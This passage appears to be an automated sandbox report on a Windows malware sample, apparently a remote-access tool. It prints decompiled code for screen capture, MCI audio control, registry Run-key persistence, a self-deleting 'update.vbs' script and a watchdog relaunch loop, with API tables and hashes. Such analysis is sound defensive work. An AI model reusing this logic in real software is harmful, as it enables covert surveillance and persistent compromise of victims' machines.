											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020C7(_t194,  &_v80);
												E004020C7(_t194,  &_v168);
												E0040250F(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403428( &_v80);
												E0040250F(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403428( &_v80);
												_t235 = _a4;
												E0040250F(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403428( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402036(_t194, _t194, __eflags,  &_v168);
												E00401FB9();
												E00401FB9();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402076(_t194, _t194, 0x460734);
					L32:
					return _t194;
				}
			}

















































                                                                                                0x004152f8
                                                                                                0x00415303
                                                                                                0x0041530b
                                                                                                0x0041530e
                                                                                                0x0041531a
                                                                                                0x0041531c
                                                                                                0x0041532b
                                                                                                0x00415338
                                                                                                0x0041533d
                                                                                                0x00415340
                                                                                                0x00415345
                                                                                                0x0041535f
                                                                                                0x00415365
                                                                                                0x00415368
                                                                                                0x0041536a
                                                                                                0x00415384
                                                                                                0x0041538a
                                                                                                0x0041538c
                                                                                                0x004153a5
                                                                                                0x004153a9
                                                                                                0x004153b4
                                                                                                0x004153d4
                                                                                                0x004153da
                                                                                                0x004153dc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004153de
                                                                                                0x004153e2
                                                                                                0x004153e7
                                                                                                0x004153ef
                                                                                                0x004153f5
                                                                                                0x004153f7
                                                                                                0x00415403
                                                                                                0x00415409
                                                                                                0x0041540b
                                                                                                0x00415425
                                                                                                0x00415425
                                                                                                0x00415428
                                                                                                0x00415431
                                                                                                0x0041543c
                                                                                                0x00415440
                                                                                                0x00415446
                                                                                                0x00415446
                                                                                                0x0041540b
                                                                                                0x004153f7
                                                                                                0x0041544c
                                                                                                0x0041544f
                                                                                                0x00415454
                                                                                                0x0041545a
                                                                                                0x0041545c
                                                                                                0x00000000
                                                                                                0x00415462
                                                                                                0x00415469
                                                                                                0x0041546f
                                                                                                0x00415472
                                                                                                0x00415478
                                                                                                0x0041547a
                                                                                                0x0041547b
                                                                                                0x0041547e
                                                                                                0x00415481
                                                                                                0x004154ae
                                                                                                0x004154ae
                                                                                                0x004154b7
                                                                                                0x004154b8
                                                                                                0x004154c0
                                                                                                0x004154c4
                                                                                                0x004154c5
                                                                                                0x004154ce
                                                                                                0x004154d4
                                                                                                0x004154db
                                                                                                0x004154e3
                                                                                                0x004154e7
                                                                                                0x004154ea
                                                                                                0x004154ed
                                                                                                0x004154f4
                                                                                                0x004154f6
                                                                                                0x004154f6
                                                                                                0x00415502
                                                                                                0x00415506
                                                                                                0x0041550a
                                                                                                0x0041550b
                                                                                                0x00415519
                                                                                                0x00415520
                                                                                                0x00415523
                                                                                                0x00415529
                                                                                                0x0041552c
                                                                                                0x0041552e
                                                                                                0x00415547
                                                                                                0x0041554d
                                                                                                0x0041554f
                                                                                                0x0041557c
                                                                                                0x00415590
                                                                                                0x00415595
                                                                                                0x004155a0
                                                                                                0x004155a0
                                                                                                0x004155a6
                                                                                                0x004155a9
                                                                                                0x004155b4
                                                                                                0x004155c2
                                                                                                0x004155d1
                                                                                                0x004155dc
                                                                                                0x004155eb
                                                                                                0x004155f3
                                                                                                0x004155fa
                                                                                                0x00415609
                                                                                                0x00415611
                                                                                                0x00415618
                                                                                                0x00415627
                                                                                                0x0041562a
                                                                                                0x00415635
                                                                                                0x00415640
                                                                                                0x00415648
                                                                                                0x00000000
                                                                                                0x00415648
                                                                                                0x0041555a
                                                                                                0x0041555d
                                                                                                0x00415562
                                                                                                0x0041556c
                                                                                                0x00000000
                                                                                                0x00415530
                                                                                                0x00415530
                                                                                                0x0041538f
                                                                                                0x00415395
                                                                                                0x00415398
                                                                                                0x0041539a
                                                                                                0x00000000
                                                                                                0x0041539a
                                                                                                0x0041552e
                                                                                                0x00415483
                                                                                                0x00415485
                                                                                                0x00415486
                                                                                                0x00415489
                                                                                                0x0041548c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041548e
                                                                                                0x00415490
                                                                                                0x00415491
                                                                                                0x00415494
                                                                                                0x00415497
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041549b
                                                                                                0x0041549c
                                                                                                0x0041549f
                                                                                                0x004154a8
                                                                                                0x004154aa
                                                                                                0x004154ab
                                                                                                0x004154ab
                                                                                                0x00000000
                                                                                                0x004154ab
                                                                                                0x004154a1
                                                                                                0x004154a4
                                                                                                0x00000000
                                                                                                0x004154a4
                                                                                                0x00000000
                                                                                                0x00415474
                                                                                                0x0041545c
                                                                                                0x0041538e
                                                                                                0x0041538e
                                                                                                0x00000000
                                                                                                0x0041536c
                                                                                                0x00415373
                                                                                                0x00415376
                                                                                                0x00415378
                                                                                                0x0041537a
                                                                                                0x0041537a
                                                                                                0x00000000
                                                                                                0x0041537a
                                                                                                0x0041534b
                                                                                                0x0041534b
                                                                                                0x00415352
                                                                                                0x0041564f
                                                                                                0x00415655
                                                                                                0x00415655

                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                  • Part of subcall function 00415721: GetMonitorInfoW.USER32(?,?), ref: 00415741
                                                                                                  • Part of subcall function 0041576D: GetMonitorInfoW.USER32(?,?), ref: 0041578D
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041535F
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415373
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415376
                                                                                                • DeleteObject.GDI32(?), ref: 0041537A
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00415384
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415395
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415398
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004153D4
                                                                                                • GetCursorInfo.USER32(?,?,?), ref: 004153EF
                                                                                                • GetIconInfo.USER32(?,?), ref: 00415403
                                                                                                • DeleteObject.GDI32(?), ref: 00415428
                                                                                                • DeleteObject.GDI32(?), ref: 00415431
                                                                                                • DrawIcon.USER32 ref: 00415440
                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00415454
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 004154BA
                                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00415523
                                                                                                • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00415547
                                                                                                • DeleteDC.GDI32(?), ref: 0041555A
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041555D
                                                                                                • DeleteObject.GDI32(?), ref: 00415562
                                                                                                • GlobalFree.KERNEL32 ref: 0041556C
                                                                                                • DeleteObject.GDI32(?), ref: 00415611
                                                                                                • GlobalFree.KERNEL32 ref: 00415618
                                                                                                • DeleteDC.GDI32(?), ref: 00415627
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041562A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 517350757-865373369
                                                                                                • Opcode ID: bc7ef3eaa0bc30b32919019b5e7ab841a487349196d5c5f6ca233514da78b53b
                                                                                                • Instruction ID: 92214f8bc41d115a4ee1bbf9b644f4e186d6fd6add950f8e9c2f91f818141afe
                                                                                                • Opcode Fuzzy Hash: bc7ef3eaa0bc30b32919019b5e7ab841a487349196d5c5f6ca233514da78b53b
                                                                                                • Instruction Fuzzy Hash: DDB18075900618EFDB14DFA0DC45BEEBBB8EF44715F10402AF949EB290DB74A984CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00417382, Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 185synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E00417382(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E004175C8( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = E00401EDD( &_a4);
					_t103 = 0x30;
					E00401EEC( &_a4, 0x30, _t111, E00418A4B( &_v28, 0x30, _t63));
					E00401EE2();
				}
				_t25 = E0040247B();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(E00401EDD( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402076(_t67, _t114 - 0x18, 0x460734);
						_push(0xa8);
						E00404BB7(_t67, 0x46eb60, _t103, __eflags);
					}
				} else {
					_t60 = E00401EDD( &_a4);
					_t118 = _t114 - 0x18;
					E004020DE(_t67, _t118, _t103, _t120, _t109);
					E0041843E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E00417CCA( &_v124, _t67);
					_t108 = E00403022( &_v28, E00403098(_t67,  &_v76, E00409E9E( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00403098(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					E00401EE2();
					E00401EE2();
					E00401EE2();
					E00401EE2();
					mciSendStringW(E00401EDD( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402076(0, _t114 - 0x18, 0x460734);
					_push(0xa9);
					E00404BB7(0, 0x46eb60, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46de9c = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46de9a; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46de9a = 0;
							}
							__eflags =  *0x46de99; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46de99 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46de9c);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46de9c, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46de9c; // 0x0
							} else {
								CloseHandle( *0x46de9c);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402076(0, _t115 - 0x18, 0x460734);
						_push(0xaa);
						E00404BB7(0, 0x46eb60, _t108, _t122);
						E00401EE2();
						goto L21;
					}
				}
				L21:
				return E00401EE2();
			}
























                                                                                                0x00417382
                                                                                                0x0041738c
                                                                                                0x0041738e
                                                                                                0x0041739c
                                                                                                0x004173a1
                                                                                                0x004173a7
                                                                                                0x004173b6
                                                                                                0x004173be
                                                                                                0x004173be
                                                                                                0x004173c5
                                                                                                0x004173cd
                                                                                                0x004173cf
                                                                                                0x004174bc
                                                                                                0x004174be
                                                                                                0x00000000
                                                                                                0x004174c4
                                                                                                0x004174ce
                                                                                                0x004174d3
                                                                                                0x004174dd
                                                                                                0x004174dd
                                                                                                0x004173d5
                                                                                                0x004173d5
                                                                                                0x004173da
                                                                                                0x004173e2
                                                                                                0x004173e9
                                                                                                0x004173ee
                                                                                                0x004173f1
                                                                                                0x004173fb
                                                                                                0x0041742e
                                                                                                0x00417433
                                                                                                0x0041743c
                                                                                                0x00417444
                                                                                                0x0041744c
                                                                                                0x00417454
                                                                                                0x00417467
                                                                                                0x0041747b
                                                                                                0x0041747d
                                                                                                0x00417487
                                                                                                0x0041748c
                                                                                                0x00417496
                                                                                                0x004174a0
                                                                                                0x004174a6
                                                                                                0x004174a6
                                                                                                0x004174a6
                                                                                                0x00417577
                                                                                                0x00417577
                                                                                                0x00417579
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004174e7
                                                                                                0x004174ed
                                                                                                0x004174f7
                                                                                                0x004174f9
                                                                                                0x004174f9
                                                                                                0x004174ff
                                                                                                0x00417505
                                                                                                0x0041750f
                                                                                                0x00417511
                                                                                                0x00417511
                                                                                                0x00417523
                                                                                                0x00417525
                                                                                                0x00417528
                                                                                                0x0041752d
                                                                                                0x0041752f
                                                                                                0x00417533
                                                                                                0x00417536
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00417538
                                                                                                0x00417539
                                                                                                0x0041753c
                                                                                                0x00000000
                                                                                                0x0041753e
                                                                                                0x00417544
                                                                                                0x00417544
                                                                                                0x00000000
                                                                                                0x0041753c
                                                                                                0x0041755b
                                                                                                0x0041755d
                                                                                                0x00417572
                                                                                                0x0041755f
                                                                                                0x00417565
                                                                                                0x0041756b
                                                                                                0x00000000
                                                                                                0x0041756b
                                                                                                0x0041755d
                                                                                                0x00417587
                                                                                                0x00417591
                                                                                                0x0041759d
                                                                                                0x004175a2
                                                                                                0x004175ac
                                                                                                0x004175b4
                                                                                                0x00000000
                                                                                                0x004175b4
                                                                                                0x004174a6
                                                                                                0x004175b9
                                                                                                0x004175c7

                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00417467
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041747B
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00460734), ref: 004174A0
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,0046E250,00000000), ref: 004174B6
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004174F7
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041750F
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00417523
                                                                                                • SetEvent.KERNEL32 ref: 00417544
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 00417555
                                                                                                • CloseHandle.KERNEL32 ref: 00417565
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00417587
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00417591
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $`F$`F$`F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                • API String ID: 738084811-3238727370
                                                                                                • Opcode ID: 84a5a2df212cece98ef6f13e60bfa61e96272978f9ebe182fcaae50cecadf0ae
                                                                                                • Instruction ID: a95081da255d8c9c391adb4703ecece35ef243cada4fea7cc53d17a4b1729a4c
                                                                                                • Opcode Fuzzy Hash: 84a5a2df212cece98ef6f13e60bfa61e96272978f9ebe182fcaae50cecadf0ae
                                                                                                • Instruction Fuzzy Hash: 1E51C370B002087AD704FBB6DC92DBE3B6DDB50748B10403FF506AA1E6EE795D4586AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040B106, Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 280registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E0040B106(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E00410199();
				if( *0x46c9c4 != 0x30) {
					E00409DA8();
				}
				_t243 =  *0x46dd5f - 1; // 0x0
				if(_t243 == 0) {
					E00415D62(_t243);
				}
				if( *0x46da75 != 0) {
					E00418144(E00401EDD(0x46e0d4));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46daf6 - 1; // 0x1
				if(_t245 == 0) {
					E00410D8B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EDD(0x46e578));
				}
				_t246 =  *0x46daef - 1; // 0x0
				if(_t246 == 0) {
					E00410D8B(0x80000002, _t231, E00401EDD(0x46e578));
				}
				_t247 =  *0x46daf4 - 1; // 0x0
				if(_t247 == 0) {
					E00410D8B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EDD(0x46e578));
				}
				_t53 = E0040247B();
				_t54 = E00401F87(0x46e5f0);
				_t57 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F87(0x46e5a8));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46e5c0;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E00407647(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46e5c0;
					SetFileAttributesW(E00401EDD(0x46e5c0), 0x80);
				}
				E00403098(_t134,  &_v124, E00404260(_t134,  &_v52, E00437AEF(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				E00401EE2();
				E004043E6(_t134,  &_v28, L"On Error Resume Next\n", _t249, E00404260(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00401EE2();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403303(E00403098(_t134,  &_v52, E004043E6(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E00404260(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					E00401EE2();
					E00401EE2();
					E00401EE2();
				}
				E00403303(E00403098(_t134,  &_v100, E00403098(_t134,  &_v76, E00404260(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040778C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E00407647(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403303(E00403098(0x46079c,  &_v100, E00409E9E( &_v76, L"fso.DeleteFolder \"", _t252, 0x46e5c0), 0, _t252, L"\"\n"));
					E00401EE2();
					E00401EE2();
				}
				_t79 = E00404260(0x46079c,  &_v172, L"\"\"\", 0");
				E00403303(E00403098(0x46079c,  &_v100, E00403022( &_v76, E0040440A(0x46079c,  &_v52, E00404260(0x46079c,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E0040778C(0x46079c,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00401EDD( &_v124);
				_t93 = E0040247B();
				if(E00418337(E00401EDD( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EDD( &_v124), 0x46079c, 0x46079c, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE2();
				E00401EE2();
				return E00401EE2();
			}




























                                                                                                0x0040b112
                                                                                                0x0040b11e
                                                                                                0x0040b120
                                                                                                0x0040b120
                                                                                                0x0040b128
                                                                                                0x0040b12e
                                                                                                0x0040b130
                                                                                                0x0040b130
                                                                                                0x0040b13c
                                                                                                0x0040b14a
                                                                                                0x0040b14a
                                                                                                0x0040b154
                                                                                                0x0040b159
                                                                                                0x0040b15f
                                                                                                0x0040b170
                                                                                                0x0040b175
                                                                                                0x0040b176
                                                                                                0x0040b17c
                                                                                                0x0040b18d
                                                                                                0x0040b192
                                                                                                0x0040b193
                                                                                                0x0040b199
                                                                                                0x0040b1ad
                                                                                                0x0040b1b2
                                                                                                0x0040b1ba
                                                                                                0x0040b1c2
                                                                                                0x0040b1e8
                                                                                                0x0040b1f2
                                                                                                0x0040b1f4
                                                                                                0x0040b1ff
                                                                                                0x0040b1ff
                                                                                                0x0040b212
                                                                                                0x0040b22a
                                                                                                0x0040b235
                                                                                                0x0040b23a
                                                                                                0x0040b23c
                                                                                                0x0040b23f
                                                                                                0x0040b244
                                                                                                0x0040b246
                                                                                                0x0040b24d
                                                                                                0x0040b258
                                                                                                0x0040b258
                                                                                                0x0040b278
                                                                                                0x0040b281
                                                                                                0x0040b29c
                                                                                                0x0040b2a5
                                                                                                0x0040b2aa
                                                                                                0x0040b2ac
                                                                                                0x0040b2e0
                                                                                                0x0040b2e8
                                                                                                0x0040b2f0
                                                                                                0x0040b2f8
                                                                                                0x0040b2f8
                                                                                                0x0040b330
                                                                                                0x0040b338
                                                                                                0x0040b340
                                                                                                0x0040b348
                                                                                                0x0040b34d
                                                                                                0x0040b34f
                                                                                                0x0040b359
                                                                                                0x0040b359
                                                                                                0x0040b36c
                                                                                                0x0040b371
                                                                                                0x0040b373
                                                                                                0x0040b398
                                                                                                0x0040b3a0
                                                                                                0x0040b3a8
                                                                                                0x0040b3a8
                                                                                                0x0040b3bd
                                                                                                0x0040b3fc
                                                                                                0x0040b404
                                                                                                0x0040b40c
                                                                                                0x0040b414
                                                                                                0x0040b41f
                                                                                                0x0040b42a
                                                                                                0x0040b437
                                                                                                0x0040b440
                                                                                                0x0040b449
                                                                                                0x0040b467
                                                                                                0x0040b487
                                                                                                0x0040b487
                                                                                                0x0040b490
                                                                                                0x0040b498
                                                                                                0x0040b4ab

                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1FF
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B212
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B22A
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B258
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(00408881,00000000,?,0040ADC7), ref: 00409DB7
                                                                                                  • Part of subcall function 00409DA8: UnhookWindowsHookEx.USER32(00000000), ref: 00409DC7
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(Function_00008866,00000000,?,0040ADC7), ref: 00409DD9
                                                                                                  • Part of subcall function 00418337: CreateFileW.KERNELBASE(00405F06,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00418461,00000000,00000000), ref: 00418376
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B47B
                                                                                                • ExitProcess.KERNEL32 ref: 0040B487
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: """, 0$")$0f$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$x(f
                                                                                                • API String ID: 1861856835-2189821385
                                                                                                • Opcode ID: 1b3773f33782ea4df630d354779f34fe65719c9eda1c0bb3231cc2d60f97e349
                                                                                                • Instruction ID: 943384c39921bc6d563c0f7d59a9bdf134d260cf3cda96db00c0ddd81e813327
                                                                                                • Opcode Fuzzy Hash: 1b3773f33782ea4df630d354779f34fe65719c9eda1c0bb3231cc2d60f97e349
                                                                                                • Instruction Fuzzy Hash: 3D919171A001185ACB04FBA2DCA6AEE7769AF50308F14007FF506B71E2EF785E46869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040FDD3, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 181synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E0040FDD3() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E0040247B();
				_t28 = E00401F87(0x46e5f0);
				_t108 = 0x46e5a8;
				_t31 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E004020C7(0,  &_v32);
					if(E004183CC( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E004108B4(E00401F87(0x46e5a8), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
